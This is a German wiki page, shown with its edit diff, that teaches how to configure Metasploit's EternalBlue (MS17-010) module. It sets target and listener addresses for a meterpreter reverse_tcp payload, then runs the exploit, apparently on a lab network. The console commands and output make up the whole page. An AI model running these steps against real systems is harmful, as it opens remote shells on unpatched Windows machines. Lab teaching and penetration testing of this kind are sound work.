Metasploit options einstellen: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „*msf6 exploit(windows/smb/ms17_010_eternalblue) > options <pre> Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting…“)
 
 
Zeile 1: Zeile 1:
 +
=Anzeigen der Optionen=
 
*msf6 exploit(windows/smb/ms17_010_eternalblue) > options  
 
*msf6 exploit(windows/smb/ms17_010_eternalblue) > options  
 
<pre>
 
<pre>
Zeile 29: Zeile 30:
 
   0  Windows 7 and Server 2008 R2 (x64) All Service Packs
 
   0  Windows 7 and Server 2008 R2 (x64) All Service Packs
 
</pre>
 
</pre>
 +
=RHOSTS=
 +
*msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.12
 +
RHOSTS => 192.168.0.12
 +
=PAYLOADS=
 +
*msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads
 +
=LHOSTS=
 +
*msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.11
 +
LHOST => 192.168.0.11
 +
=EXPLOIT=
 +
*msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Aktuelle Version vom 4. August 2021, 21:42 Uhr

Anzeigen der Optionen

  • msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     94.130.248.209   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

RHOSTS

  • msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.12
RHOSTS => 192.168.0.12

PAYLOADS

  • msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads

LHOSTS

  • msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.11
LHOST => 192.168.0.11

EXPLOIT

  • msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit